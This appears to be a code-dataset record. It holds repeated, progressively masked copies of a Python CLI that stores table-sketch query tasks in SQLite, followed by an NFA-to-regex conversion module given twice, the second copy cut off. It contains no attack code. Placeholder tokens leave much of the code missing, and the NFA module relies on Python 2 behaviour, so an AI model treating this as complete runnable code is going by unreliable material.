input_nlq():\n nlq = input('NLQ (default: How many singers are there?)> ')\n if not nlq:\n nlq = 'How many singers are there?'\n return nlq\n\n\ndef input_num_cols():\n while True:\n num_cols = input('Number of columns > ')\n try:\n num_cols = int(num_cols)\n break\n except Exception as e:\n print('Number of columns should be integer!')\n return num_cols\n\n\ndef input_order():\n ordered = False\n while True:\n order_input = input('Should results be ordered? (y/n) > ')\n if order_input == 'y':\n ordered = True\n break\n elif order_input == 'n':\n break\n else:\n print('y/n only!')\n return ordered\n\n\ndef input_limit():\n limit = None\n while True:\n limit_input = input('Limit results to n tuples? (int or blank) > ')\n if not limit_input:\n break\n try:\n limit = int(limit_input)\n break\n except Exception as e:\n print('int or blank only!')\n return limit\n\n\ndef input_tsq_types(num_cols):\n while True:\n types_input = input('Types (`text` or `number`, comma separated)> ')\n types = list(map(lambda x: x.strip(), types_input.split(',')))\n if any(map(lambda x: x not in ('text', 'number'), types)):\n print('Types must be `text` or `number`')\n continue\n if len(types) != num_cols:\n print('Number of types must match number of columns.')\n continue\n break\n return types\n\n\n<function token>\n\n\ndef input_tsq_row(row_num, tsq_types):\n while True:\n row_input = input(f'Row {row_num} (semicolon-separated values) > ')\n tsq_row = list(map(lambda x: x.strip(), row_input.split(';')))\n validated = True\n for i, cell in enumerate(tsq_row):\n if tsq_types[i] == 'number':\n try:\n float(cell)\n except Exception as e:\n print('At least one cell value is invalid.')\n validated = False\n break\n if validated:\n break\n return tsq_row\n\n\ndef main():\n config = configparser.ConfigParser()\n config.read('config.ini')\n db_path = config['db']['path']\n conn = sqlite3.connect(db_path)\n db_name = input_db_name(conn)\n nlq = input_nlq()\n num_cols = input_num_cols()\n tsq = TableSketchQuery(num_cols)\n tsq.types = input_tsq_types(num_cols)\n tsq_row_count = input_tsq_row_count()\n for i in range(tsq_row_count):\n tsq.values.append(input_tsq_row(i + 1, tsq.types))\n tsq.order = input_order()\n tsq.limit = input_limit()\n print(tsq.to_proto())\n cur = conn.cursor()\n cur.execute(\n \"\"\"INSERT INTO tasks (tid, db, nlq, tsq_proto, status, time)\n VALUES (?, ?, ?, ?, ?, ?)\"\"\"\n , (str(uuid.uuid4()), db_name, nlq, tsq.to_proto().\n SerializeToString(), 'waiting', int(time.time())))\n conn.commit()\n conn.close()\n\n\n<code token>\n", "<import token>\n<function token>\n\n\ndef input_nlq():\n nlq = input('NLQ (default: How many singers are there?)> ')\n if not nlq:\n nlq = 'How many singers are there?'\n return nlq\n\n\ndef input_num_cols():\n while True:\n num_cols = input('Number of columns > ')\n try:\n num_cols = int(num_cols)\n break\n except Exception as e:\n print('Number of columns should be integer!')\n return num_cols\n\n\ndef input_order():\n ordered = False\n while True:\n order_input = input('Should results be ordered? (y/n) > ')\n if order_input == 'y':\n ordered = True\n break\n elif order_input == 'n':\n break\n else:\n print('y/n only!')\n return ordered\n\n\ndef input_limit():\n limit = None\n while True:\n limit_input = input('Limit results to n tuples? (int or blank) > ')\n if not limit_input:\n break\n try:\n limit = int(limit_input)\n break\n except Exception as e:\n print('int or blank only!')\n return limit\n\n\ndef input_tsq_types(num_cols):\n while True:\n types_input = input('Types (`text` or `number`, comma separated)> ')\n types = list(map(lambda x: x.strip(), types_input.split(',')))\n if any(map(lambda x: x not in ('text', 'number'), types)):\n print('Types must be `text` or `number`')\n continue\n if len(types) != num_cols:\n print('Number of types must match number of columns.')\n continue\n break\n return types\n\n\n<function token>\n\n\ndef input_tsq_row(row_num, tsq_types):\n while True:\n row_input = input(f'Row {row_num} (semicolon-separated values) > ')\n tsq_row = list(map(lambda x: x.strip(), row_input.split(';')))\n validated = True\n for i, cell in enumerate(tsq_row):\n if tsq_types[i] == 'number':\n try:\n float(cell)\n except Exception as e:\n print('At least one cell value is invalid.')\n validated = False\n break\n if validated:\n break\n return tsq_row\n\n\ndef main():\n config = configparser.ConfigParser()\n config.read('config.ini')\n db_path = config['db']['path']\n conn = sqlite3.connect(db_path)\n db_name = input_db_name(conn)\n nlq = input_nlq()\n num_cols = input_num_cols()\n tsq = TableSketchQuery(num_cols)\n tsq.types = input_tsq_types(num_cols)\n tsq_row_count = input_tsq_row_count()\n for i in range(tsq_row_count):\n tsq.values.append(input_tsq_row(i + 1, tsq.types))\n tsq.order = input_order()\n tsq.limit = input_limit()\n print(tsq.to_proto())\n cur = conn.cursor()\n cur.execute(\n \"\"\"INSERT INTO tasks (tid, db, nlq, tsq_proto, status, time)\n VALUES (?, ?, ?, ?, ?, ?)\"\"\"\n , (str(uuid.uuid4()), db_name, nlq, tsq.to_proto().\n SerializeToString(), 'waiting', int(time.time())))\n conn.commit()\n conn.close()\n\n\n<code token>\n", "<import token>\n<function token>\n\n\ndef input_nlq():\n nlq = input('NLQ (default: How many singers are there?)> ')\n if not nlq:\n nlq = 'How many singers are there?'\n return nlq\n\n\ndef input_num_cols():\n while True:\n num_cols = input('Number of columns > ')\n try:\n num_cols = int(num_cols)\n break\n except Exception as e:\n print('Number of columns should be integer!')\n return num_cols\n\n\ndef input_order():\n ordered = False\n while True:\n order_input = input('Should results be ordered? (y/n) > ')\n if order_input == 'y':\n ordered = True\n break\n elif order_input == 'n':\n break\n else:\n print('y/n only!')\n return ordered\n\n\n<function token>\n\n\ndef input_tsq_types(num_cols):\n while True:\n types_input = input('Types (`text` or `number`, comma separated)> ')\n types = list(map(lambda x: x.strip(), types_input.split(',')))\n if any(map(lambda x: x not in ('text', 'number'), types)):\n print('Types must be `text` or `number`')\n continue\n if len(types) != num_cols:\n print('Number of types must match number of columns.')\n continue\n break\n return types\n\n\n<function token>\n\n\ndef input_tsq_row(row_num, tsq_types):\n while True:\n row_input = input(f'Row {row_num} (semicolon-separated values) > ')\n tsq_row = list(map(lambda x: x.strip(), row_input.split(';')))\n validated = True\n for i, cell in enumerate(tsq_row):\n if tsq_types[i] == 'number':\n try:\n float(cell)\n except Exception as e:\n print('At least one cell value is invalid.')\n validated = False\n break\n if validated:\n break\n return tsq_row\n\n\ndef main():\n config = configparser.ConfigParser()\n config.read('config.ini')\n db_path = config['db']['path']\n conn = sqlite3.connect(db_path)\n db_name = input_db_name(conn)\n nlq = input_nlq()\n num_cols = input_num_cols()\n tsq = TableSketchQuery(num_cols)\n tsq.types = input_tsq_types(num_cols)\n tsq_row_count = input_tsq_row_count()\n for i in range(tsq_row_count):\n tsq.values.append(input_tsq_row(i + 1, tsq.types))\n tsq.order = input_order()\n tsq.limit = input_limit()\n print(tsq.to_proto())\n cur = conn.cursor()\n cur.execute(\n \"\"\"INSERT INTO tasks (tid, db, nlq, tsq_proto, status, time)\n VALUES (?, ?, ?, ?, ?, ?)\"\"\"\n , (str(uuid.uuid4()), db_name, nlq, tsq.to_proto().\n SerializeToString(), 'waiting', int(time.time())))\n conn.commit()\n conn.close()\n\n\n<code token>\n", "<import token>\n<function token>\n\n\ndef input_nlq():\n nlq = input('NLQ (default: How many singers are there?)> ')\n if not nlq:\n nlq = 'How many singers are there?'\n return nlq\n\n\ndef input_num_cols():\n while True:\n num_cols = input('Number of columns > ')\n try:\n num_cols = int(num_cols)\n break\n except Exception as e:\n print('Number of columns should be integer!')\n return num_cols\n\n\ndef input_order():\n ordered = False\n while True:\n order_input = input('Should results be ordered? (y/n) > ')\n if order_input == 'y':\n ordered = True\n break\n elif order_input == 'n':\n break\n else:\n print('y/n only!')\n return ordered\n\n\n<function token>\n\n\ndef input_tsq_types(num_cols):\n while True:\n types_input = input('Types (`text` or `number`, comma separated)> ')\n types = list(map(lambda x: x.strip(), types_input.split(',')))\n if any(map(lambda x: x not in ('text', 'number'), types)):\n print('Types must be `text` or `number`')\n continue\n if len(types) != num_cols:\n print('Number of types must match number of columns.')\n continue\n break\n return types\n\n\n<function token>\n\n\ndef input_tsq_row(row_num, tsq_types):\n while True:\n row_input = input(f'Row {row_num} (semicolon-separated values) > ')\n tsq_row = list(map(lambda x: x.strip(), row_input.split(';')))\n validated = True\n for i, cell in enumerate(tsq_row):\n if tsq_types[i] == 'number':\n try:\n float(cell)\n except Exception as e:\n print('At least one cell value is invalid.')\n validated = False\n break\n if validated:\n break\n return tsq_row\n\n\n<function token>\n<code token>\n", "<import token>\n<function token>\n\n\ndef input_nlq():\n nlq = input('NLQ (default: How many singers are there?)> ')\n if not nlq:\n nlq = 'How many singers are there?'\n return nlq\n\n\ndef input_num_cols():\n while True:\n num_cols = input('Number of columns > ')\n try:\n num_cols = int(num_cols)\n break\n except Exception as e:\n print('Number of columns should be integer!')\n return num_cols\n\n\ndef input_order():\n ordered = False\n while True:\n order_input = input('Should results be ordered? (y/n) > ')\n if order_input == 'y':\n ordered = True\n break\n elif order_input == 'n':\n break\n else:\n print('y/n only!')\n return ordered\n\n\n<function token>\n\n\ndef input_tsq_types(num_cols):\n while True:\n types_input = input('Types (`text` or `number`, comma separated)> ')\n types = list(map(lambda x: x.strip(), types_input.split(',')))\n if any(map(lambda x: x not in ('text', 'number'), types)):\n print('Types must be `text` or `number`')\n continue\n if len(types) != num_cols:\n print('Number of types must match number of columns.')\n continue\n break\n return types\n\n\n<function token>\n<function token>\n<function token>\n<code token>\n", "<import token>\n<function token>\n\n\ndef input_nlq():\n nlq = input('NLQ (default: How many singers are there?)> ')\n if not nlq:\n nlq = 'How many singers are there?'\n return nlq\n\n\ndef input_num_cols():\n while True:\n num_cols = input('Number of columns > ')\n try:\n num_cols = int(num_cols)\n break\n except Exception as e:\n print('Number of columns should be integer!')\n return num_cols\n\n\n<function token>\n<function token>\n\n\ndef input_tsq_types(num_cols):\n while True:\n types_input = input('Types (`text` or `number`, comma separated)> ')\n types = list(map(lambda x: x.strip(), types_input.split(',')))\n if any(map(lambda x: x not in ('text', 'number'), types)):\n print('Types must be `text` or `number`')\n continue\n if len(types) != num_cols:\n print('Number of types must match number of columns.')\n continue\n break\n return types\n\n\n<function token>\n<function token>\n<function token>\n<code token>\n", "<import token>\n<function token>\n<function token>\n\n\ndef input_num_cols():\n while True:\n num_cols = input('Number of columns > ')\n try:\n num_cols = int(num_cols)\n break\n except Exception as e:\n print('Number of columns should be integer!')\n return num_cols\n\n\n<function token>\n<function token>\n\n\ndef input_tsq_types(num_cols):\n while True:\n types_input = input('Types (`text` or `number`, comma separated)> ')\n types = list(map(lambda x: x.strip(), types_input.split(',')))\n if any(map(lambda x: x not in ('text', 'number'), types)):\n print('Types must be `text` or `number`')\n continue\n if len(types) != num_cols:\n print('Number of types must match number of columns.')\n continue\n break\n return types\n\n\n<function token>\n<function token>\n<function token>\n<code token>\n", "<import token>\n<function token>\n<function token>\n\n\ndef input_num_cols():\n while True:\n num_cols = input('Number of columns > ')\n try:\n num_cols = int(num_cols)\n break\n except Exception as e:\n print('Number of columns should be integer!')\n return num_cols\n\n\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<code token>\n", "<import token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<code token>\n" ]
false
94
2fe20f28fc7bba6b8188f5068e2b3c8b87c15edc
from util import AutomataError from automata import NFA from base import Node from copy import copy, deepcopy from os.path import commonprefix DEBUG = False LAMBDA = u'\u03bb' PHI = u'\u00d8' def copyDeltas(src): out = dict() for k in src: out[k] = dict() for k2 in src[k]: out[k][k2] = copy(src[k][k2]) return out def replaceNode(nfa, old, new): if DEBUG: print('R_Start(%s, %s) ---' % (old, new), nfa) if old in nfa._deltas: for input in nfa._deltas[old]: nfa.addDelta(new, input, nfa._deltas[old][input]) del nfa._deltas[old] if DEBUG: print('R_SwitchedSource(%s, %s) ---' % (old, new), nfa) deltas_temp = copyDeltas(nfa._deltas) for src in deltas_temp: for input in deltas_temp[src]: if old in deltas_temp[src][input]: nfa._deltas[src][input].remove(old) nfa._deltas[src][input].add(new) if DEBUG: print('R_SwitchedDest(%s, %s) ---' % (old, new), nfa) def commonsuffix(seq): def reverse(s): out = '' for c in reversed(s): out += c return out seq = [reverse(i) for i in seq] return reverse(commonprefix(seq)) class NetworkNFA(NFA): def __init__(self, nfa): if type(nfa) is not NFA: raise AutomataError('Can create a NetworkNFA only from an NFA.') if all([len(i) == 1 for i in nfa.charset]): self._charset = copy(nfa._charset) else: self._charset = set(['{%s}' % i for i in nfa._charset]) self._nodes = copy(nfa._nodes) self._deltas = copyDeltas(nfa._deltas) self._start = nfa._start self._terminals = copy(nfa._terminals) def addDelta(self, node, input, dest): if set(input) - (self._charset.union(set('()+*'))): raise AutomataError('%s contains symbols not in charset.' % input) if type(node) is Node: if type(dest) is set and all([type(i) is Node for i in dest]): if len(dest): if node in self._deltas: if input in self._deltas[node]: self._deltas[node][input] = self._deltas[node][input].union( dest) else: self._deltas[node][input] = dest else: self._deltas[node] = {input: dest} elif type(dest) is Node: if node in self._deltas: if input in self._deltas[node]: self._deltas[node][input].add(dest) else: self._deltas[node][input] = set([dest]) else: self._deltas[node] = {input: set([dest])} else: raise AutomataError( 'Delta destination must be a Node or a set of nodes, not %s.' % type(dest).__name__) else: raise AutomataError( 'Delta source must be Node, not %s.' % type(node).__name__) def remDelta(self, node, input): if set(input) - (self._charset.union(set('()+*'))): raise AutomataError('%s contains symbols not in charset.' % input) if type(node) is Node: if node in self._deltas and input in self._deltas[node]: self._deltas[node].pop(input) if len(self._deltas[node]) == 0: del self._deltas[node] else: raise AutomataError( 'Delta source must be a Node, not %s' % type(node).__name__) def isValid(self): if len(self._nodes) == 0: return False if self._start not in self._nodes: return False for i in self._terminals: if i not in self._nodes: return False if not set(self._deltas.keys()).issubset(self._nodes): return False for key in self._deltas: for char in self._deltas[key]: if set(char) - (self._charset.union(set('()+*'))): return False return True def apply(self, input, start): raise AutomataError('NetworkNFA does not allow direct application.') def __repr__(self): ret = '<NetworkNFA>\n' ret += ' Charset: {%s}\n' % ','.join(filter(None, self._charset)) ret += ' Nodes: {%s}\n' % ','.join([i.label for i in self._nodes]) ret += 'Terminals: {%s}\n' % ','.join( [i.label for i in self._terminals]) ret += ' Start: %s\n' % (self._start and self._start.label) ret += ' Delta: ' if len(self._deltas): for qFrom in self._deltas: for input in self._deltas[qFrom]: ret += 'D(%s, %s) -> {%s}\n ' % (qFrom.label, input or 'lambda', ','.join( [i.label for i in self._deltas[qFrom][input]])) ret = ret.rstrip() + '\n' else: ret += 'None\n' ret += ' Valid: %s\n' % ('Yes' if self.isValid() else 'No') ret += '</NetworkNFA>' return ret def nfa2regex(nfa): if not nfa.isValid(): raise AutomataError( 'NFA must be in a valid state to be converted to a regex.') network = NetworkNFA(nfa) if DEBUG: print('START', network) # Take care of multi-terminals # if len(network.terminals) > 1: ## end = Node('qf') # network.addNode(end) # for i in copy(network.terminals): ## network.addDelta(i, '', end) # network.remTerminal(i) # network.addTerminal(end) # Add a dummy start and end nodes start = Node('qs') network.addNode(start) network.addDelta(start, '', network.start) network.start = start end = Node('qf') network.addNode(end) for i in network.terminals: network.addDelta(i, '', end) network.remTerminal(i) network.addTerminal(end) if DEBUG: print('Dummies added: ', network) # Collapse connections for src in network.nodes: delta_temp = network.getDelta(src) for dest in network.nodes: chars = [] for input in delta_temp: if input and dest in delta_temp[input]: chars.append(input) if len(chars): for c in chars: delta_temp[c].remove(dest) if len(delta_temp[c]) == 0: del delta_temp[c] if len(chars) > 1: chars = '(' + '+'.join(chars) + ')' else: chars = '+'.join(chars) network.addDelta(src, chars, dest) if DEBUG: print('Collapsed: ', network) # Collect pliable nodes pliableNodes = list(network.nodes) pliableNodes.remove(network.start) for n in network.terminals: pliableNodes.remove(n) # Build a distance-from-terminal table nodeFinalDist = {} maxDist = len(network.nodes) ** len(network.nodes) # Lazy for n in network.nodes: nodeFinalDist[n] = maxDist nodeFinalDist[network.terminals[0]] = 0 toProcess = list(network.nodes) toProcess.remove(network.terminals[0]) while len(toProcess): for node in toProcess: dests = network.getDelta(node).values() if len(dests) == 0: dests = set([]) else: dests = reduce(set.union, network.getDelta(node).values()) if len(dests) == 0: toProcess.remove(node) else: minDist = min([nodeFinalDist[i] for i in dests]) if minDist != maxDist: nodeFinalDist[node] = minDist + 1 toProcess.remove(node) # Sort pliable nodes by distance from terminal pliableNodes.sort(key=lambda x: nodeFinalDist[x], reverse=True) if DEBUG: print('Pliables: ', pliableNodes) for node in pliableNodes: # Remove Node network.remNode(node) # Save delta delta = copy(network.getDelta(node)) # Convert loops to regex loops = [] for input in delta: if node in delta[input]: if len(input): loops.append(input) loopRegex = '+'.join(loops) if len(loopRegex) > 1 and not (loopRegex[0] == '(' and loopRegex[-1] == ')'): loopRegex = '(' + loopRegex + ')*' elif len(loopRegex) >= 1: loopRegex = loopRegex + '*' # Remove loops for input in copy(delta): if delta[input] == set([node]): del delta[input] elif node in delta[input]: delta[input].remove(node) # Search lambda-closure equivalence if '' in delta and (len(delta) != 1 or len(delta['']) != 1): eligible = [] for dest in delta['']: delta_temp = network.getDelta(dest) if '' in delta_temp and node in delta_temp['']: eligible.append(dest) if len(eligible): replaceNode(network, node, eligible[0]) continue # Remove delta try: del network._deltas[node] except KeyError: # No deltas remaining, had only loops continue if DEBUG: print('Working on connections: ', node, delta) # Check all possible connections through this node deltas_temp = copyDeltas(network._deltas) for src in deltas_temp: for input in deltas_temp[src]: tempDeltaDest = network.getDelta(src)[input] if node in tempDeltaDest: tempDeltaDest.remove(node) if len(tempDeltaDest) == 0: network.remDelta(src, input) for input2 in delta: for dest in delta[input2]: if not (src == dest and (input + loopRegex + input2) == ''): network.addDelta( src, input + loopRegex + input2, dest) if DEBUG: print('New Delta:', src, input, loopRegex, input2, dest, network) # Extract common prefix/suffix branches = network.getDelta(network.start).keys() if len(branches) == 1: regex = branches[0] else: prefix = commonprefix(branches) suffix = commonsuffix(branches) branches = [i[len(prefix):-len(suffix)] if len(suffix) else i[len(prefix):] for i in branches] branches.sort(key=len) if len(prefix) or len(suffix): regex = prefix + \ '(' + '+'.join([i or LAMBDA for i in branches]) + ')' + suffix else: regex = '+'.join([i or LAMBDA for i in branches]) or PHI return regex
[ "from util import AutomataError\nfrom automata import NFA\nfrom base import Node\nfrom copy import copy, deepcopy\nfrom os.path import commonprefix\n\nDEBUG = False\n\nLAMBDA = u'\\u03bb'\nPHI = u'\\u00d8'\n\n\ndef copyDeltas(src):\n out = dict()\n for k in src:\n out[k] = dict()\n for k2 in src[k]:\n out[k][k2] = copy(src[k][k2])\n\n return out\n\n\ndef replaceNode(nfa, old, new):\n if DEBUG:\n print('R_Start(%s, %s) ---' % (old, new), nfa)\n if old in nfa._deltas:\n for input in nfa._deltas[old]:\n nfa.addDelta(new, input, nfa._deltas[old][input])\n del nfa._deltas[old]\n if DEBUG:\n print('R_SwitchedSource(%s, %s) ---' % (old, new), nfa)\n\n deltas_temp = copyDeltas(nfa._deltas)\n for src in deltas_temp:\n for input in deltas_temp[src]:\n if old in deltas_temp[src][input]:\n nfa._deltas[src][input].remove(old)\n nfa._deltas[src][input].add(new)\n if DEBUG:\n print('R_SwitchedDest(%s, %s) ---' % (old, new), nfa)\n\n\ndef commonsuffix(seq):\n def reverse(s):\n out = ''\n for c in reversed(s):\n out += c\n return out\n\n seq = [reverse(i) for i in seq]\n return reverse(commonprefix(seq))\n\n\nclass NetworkNFA(NFA):\n def __init__(self, nfa):\n if type(nfa) is not NFA:\n raise AutomataError('Can create a NetworkNFA only from an NFA.')\n\n if all([len(i) == 1 for i in nfa.charset]):\n self._charset = copy(nfa._charset)\n else:\n self._charset = set(['{%s}' % i for i in nfa._charset])\n\n self._nodes = copy(nfa._nodes)\n self._deltas = copyDeltas(nfa._deltas)\n self._start = nfa._start\n self._terminals = copy(nfa._terminals)\n\n def addDelta(self, node, input, dest):\n if set(input) - (self._charset.union(set('()+*'))):\n raise AutomataError('%s contains symbols not in charset.' % input)\n\n if type(node) is Node:\n if type(dest) is set and all([type(i) is Node for i in dest]):\n if len(dest):\n if node in self._deltas:\n if input in self._deltas[node]:\n self._deltas[node][input] = self._deltas[node][input].union(\n dest)\n else:\n self._deltas[node][input] = dest\n else:\n self._deltas[node] = {input: dest}\n elif type(dest) is Node:\n if node in self._deltas:\n if input in self._deltas[node]:\n self._deltas[node][input].add(dest)\n else:\n self._deltas[node][input] = set([dest])\n else:\n self._deltas[node] = {input: set([dest])}\n else:\n raise AutomataError(\n 'Delta destination must be a Node or a set of nodes, not %s.' % type(dest).__name__)\n else:\n raise AutomataError(\n 'Delta source must be Node, not %s.' % type(node).__name__)\n\n def remDelta(self, node, input):\n if set(input) - (self._charset.union(set('()+*'))):\n raise AutomataError('%s contains symbols not in charset.' % input)\n\n if type(node) is Node:\n if node in self._deltas and input in self._deltas[node]:\n self._deltas[node].pop(input)\n if len(self._deltas[node]) == 0:\n del self._deltas[node]\n else:\n raise AutomataError(\n 'Delta source must be a Node, not %s' % type(node).__name__)\n\n def isValid(self):\n if len(self._nodes) == 0:\n return False\n if self._start not in self._nodes:\n return False\n\n for i in self._terminals:\n if i not in self._nodes:\n return False\n\n if not set(self._deltas.keys()).issubset(self._nodes):\n return False\n\n for key in self._deltas:\n for char in self._deltas[key]:\n if set(char) - (self._charset.union(set('()+*'))):\n return False\n\n return True\n\n def apply(self, input, start):\n raise AutomataError('NetworkNFA does not allow direct application.')\n\n def __repr__(self):\n ret = '<NetworkNFA>\\n'\n ret += ' Charset: {%s}\\n' % ','.join(filter(None, self._charset))\n ret += ' Nodes: {%s}\\n' % ','.join([i.label for i in self._nodes])\n ret += 'Terminals: {%s}\\n' % ','.join(\n [i.label for i in self._terminals])\n ret += ' Start: %s\\n' % (self._start and self._start.label)\n ret += ' Delta: '\n if len(self._deltas):\n for qFrom in self._deltas:\n for input in self._deltas[qFrom]:\n ret += 'D(%s, %s) -> {%s}\\n ' % (qFrom.label, input or 'lambda', ','.join(\n [i.label for i in self._deltas[qFrom][input]]))\n ret = ret.rstrip() + '\\n'\n else:\n ret += 'None\\n'\n ret += ' Valid: %s\\n' % ('Yes' if self.isValid() else 'No')\n ret += '</NetworkNFA>'\n\n return ret\n\n\ndef nfa2regex(nfa):\n if not nfa.isValid():\n raise AutomataError(\n 'NFA must be in a valid state to be converted to a regex.')\n\n network = NetworkNFA(nfa)\n\n if DEBUG:\n print('START', network)\n\n# Take care of multi-terminals\n# if len(network.terminals) > 1:\n## end = Node('qf')\n# network.addNode(end)\n# for i in copy(network.terminals):\n## network.addDelta(i, '', end)\n# network.remTerminal(i)\n# network.addTerminal(end)\n\n # Add a dummy start and end nodes\n start = Node('qs')\n network.addNode(start)\n network.addDelta(start, '', network.start)\n network.start = start\n\n end = Node('qf')\n network.addNode(end)\n for i in network.terminals:\n network.addDelta(i, '', end)\n network.remTerminal(i)\n network.addTerminal(end)\n if DEBUG:\n print('Dummies added: ', network)\n\n # Collapse connections\n for src in network.nodes:\n delta_temp = network.getDelta(src)\n for dest in network.nodes:\n chars = []\n for input in delta_temp:\n if input and dest in delta_temp[input]:\n chars.append(input)\n\n if len(chars):\n for c in chars:\n delta_temp[c].remove(dest)\n if len(delta_temp[c]) == 0:\n del delta_temp[c]\n\n if len(chars) > 1:\n chars = '(' + '+'.join(chars) + ')'\n else:\n chars = '+'.join(chars)\n network.addDelta(src, chars, dest)\n if DEBUG:\n print('Collapsed: ', network)\n\n # Collect pliable nodes\n pliableNodes = list(network.nodes)\n pliableNodes.remove(network.start)\n for n in network.terminals:\n pliableNodes.remove(n)\n\n # Build a distance-from-terminal table\n nodeFinalDist = {}\n maxDist = len(network.nodes) ** len(network.nodes) # Lazy\n for n in network.nodes:\n nodeFinalDist[n] = maxDist\n\n nodeFinalDist[network.terminals[0]] = 0\n toProcess = list(network.nodes)\n toProcess.remove(network.terminals[0])\n\n while len(toProcess):\n for node in toProcess:\n dests = network.getDelta(node).values()\n if len(dests) == 0:\n dests = set([])\n else:\n dests = reduce(set.union, network.getDelta(node).values())\n\n if len(dests) == 0:\n toProcess.remove(node)\n else:\n minDist = min([nodeFinalDist[i] for i in dests])\n if minDist != maxDist:\n nodeFinalDist[node] = minDist + 1\n toProcess.remove(node)\n\n # Sort pliable nodes by distance from terminal\n pliableNodes.sort(key=lambda x: nodeFinalDist[x], reverse=True)\n if DEBUG:\n print('Pliables: ', pliableNodes)\n\n for node in pliableNodes:\n # Remove Node\n network.remNode(node)\n\n # Save delta\n delta = copy(network.getDelta(node))\n\n # Convert loops to regex\n loops = []\n for input in delta:\n if node in delta[input]:\n if len(input):\n loops.append(input)\n loopRegex = '+'.join(loops)\n if len(loopRegex) > 1 and not (loopRegex[0] == '(' and loopRegex[-1] == ')'):\n loopRegex = '(' + loopRegex + ')*'\n elif len(loopRegex) >= 1:\n loopRegex = loopRegex + '*'\n\n # Remove loops\n for input in copy(delta):\n if delta[input] == set([node]):\n del delta[input]\n elif node in delta[input]:\n delta[input].remove(node)\n\n # Search lambda-closure equivalence\n if '' in delta and (len(delta) != 1 or len(delta['']) != 1):\n eligible = []\n for dest in delta['']:\n delta_temp = network.getDelta(dest)\n if '' in delta_temp and node in delta_temp['']:\n eligible.append(dest)\n\n if len(eligible):\n replaceNode(network, node, eligible[0])\n continue\n\n # Remove delta\n try:\n del network._deltas[node]\n except KeyError: # No deltas remaining, had only loops\n continue\n\n if DEBUG:\n print('Working on connections: ', node, delta)\n # Check all possible connections through this node\n deltas_temp = copyDeltas(network._deltas)\n for src in deltas_temp:\n for input in deltas_temp[src]:\n tempDeltaDest = network.getDelta(src)[input]\n if node in tempDeltaDest:\n tempDeltaDest.remove(node)\n if len(tempDeltaDest) == 0:\n network.remDelta(src, input)\n\n for input2 in delta:\n for dest in delta[input2]:\n if not (src == dest and (input + loopRegex + input2) == ''):\n network.addDelta(\n src, input + loopRegex + input2, dest)\n if DEBUG:\n print('New Delta:', src, input,\n loopRegex, input2, dest, network)\n\n # Extract common prefix/suffix\n branches = network.getDelta(network.start).keys()\n if len(branches) == 1:\n regex = branches[0]\n else:\n prefix = commonprefix(branches)\n suffix = commonsuffix(branches)\n branches = [i[len(prefix):-len(suffix)] if len(suffix) else i[len(prefix):]\n for i in branches]\n branches.sort(key=len)\n if len(prefix) or len(suffix):\n regex = prefix + \\\n '(' + '+'.join([i or LAMBDA for i in branches]) + ')' + suffix\n else:\n regex = '+'.join([i or LAMBDA for i in branches]) or PHI\n\n return regex\n", "from util import AutomataError\nfrom automata import NFA\nfrom base import Node\nfrom copy import copy, deepcopy\nfrom os.path import commonprefix\nDEBUG = False\nLAMBDA = u'λ'\nPHI = u'Ø'\n\n\ndef copyDeltas(src):\n out = dict()\n for k in src:\n out[k] = dict()\n for k2 in src[k]:\n out[k][k2] = copy(src[k][k2])\n return out\n\n\ndef replaceNode(nfa, old, new):\n if DEBUG:\n print('R_Start(%s, %s) ---' % (old, new), nfa)\n if old in nfa._deltas:\n for input in nfa._deltas[old]:\n nfa.addDelta(new, input, nfa._deltas[old][input])\n del nfa._deltas[old]\n if DEBUG:\n print('R_SwitchedSource(%s, %s) ---' % (old, new), nfa)\n deltas_temp = copyDeltas(nfa._deltas)\n for src in deltas_temp:\n for input in deltas_temp[src]:\n if old in deltas_temp[src][input]:\n nfa._deltas[src][input].remove(old)\n nfa._deltas[src][input].add(new)\n if DEBUG:\n print('R_SwitchedDest(%s, %s) ---' % (old, new), nfa)\n\n\ndef commonsuffix(seq):\n\n def reverse(s):\n out = ''\n for c in reversed(s):\n out += c\n return out\n seq = [reverse(i) for i in seq]\n return reverse(commonprefix(seq))\n\n\nclass NetworkNFA(NFA):\n\n def __init__(self, nfa):\n if type(nfa) is not NFA:\n raise AutomataError('Can create a NetworkNFA only from an NFA.')\n if all([(len(i) == 1) for i in nfa.charset]):\n self._charset = copy(nfa._charset)\n else:\n self._charset = set([('{%s}' % i) for i in nfa._charset])\n self._nodes = copy(nfa._nodes)\n self._deltas = copyDeltas(nfa._deltas)\n self._start = nfa._start\n self._terminals = copy(nfa._terminals)\n\n def addDelta(self, node, input, dest):\n if set(input) - self._charset.union(set('()+*')):\n raise AutomataError('%s contains symbols not in charset.' % input)\n if type(node) is Node:\n if type(dest) is set and all([(type(i) is Node) for i in dest]):\n if len(dest):\n if node in self._deltas:\n if input in self._deltas[node]:\n self._deltas[node][input] = self._deltas[node][\n input].union(dest)\n else:\n self._deltas[node][input] = dest\n else:\n self._deltas[node] = {input: dest}\n elif type(dest) is Node:\n if node in self._deltas:\n if input in self._deltas[node]:\n self._deltas[node][input].add(dest)\n else:\n self._deltas[node][input] = set([dest])\n else:\n self._deltas[node] = {input: set([dest])}\n else:\n raise AutomataError(\n 'Delta destination must be a Node or a set of nodes, not %s.'\n % type(dest).__name__)\n else:\n raise AutomataError('Delta source must be Node, not %s.' % type\n (node).__name__)\n\n def remDelta(self, node, input):\n if set(input) - self._charset.union(set('()+*')):\n raise AutomataError('%s contains symbols not in charset.' % input)\n if type(node) is Node:\n if node in self._deltas and input in self._deltas[node]:\n self._deltas[node].pop(input)\n if len(self._deltas[node]) == 0:\n del self._deltas[node]\n else:\n raise AutomataError('Delta source must be a Node, not %s' %\n type(node).__name__)\n\n def isValid(self):\n if len(self._nodes) == 0:\n return False\n if self._start not in self._nodes:\n return False\n for i in self._terminals:\n if i not in self._nodes:\n return False\n if not set(self._deltas.keys()).issubset(self._nodes):\n return False\n for key in self._deltas:\n for char in self._deltas[key]:\n if set(char) - self._charset.union(set('()+*')):\n return False\n return True\n\n def apply(self, input, start):\n raise AutomataError('NetworkNFA does not allow direct application.')\n\n def __repr__(self):\n ret = '<NetworkNFA>\\n'\n ret += ' Charset: {%s}\\n' % ','.join(filter(None, self._charset))\n ret += ' Nodes: {%s}\\n' % ','.join([i.label for i in self._nodes])\n ret += 'Terminals: {%s}\\n' % ','.join([i.label for i in self.\n _terminals])\n ret += ' Start: %s\\n' % (self._start and self._start.label)\n ret += ' Delta: '\n if len(self._deltas):\n for 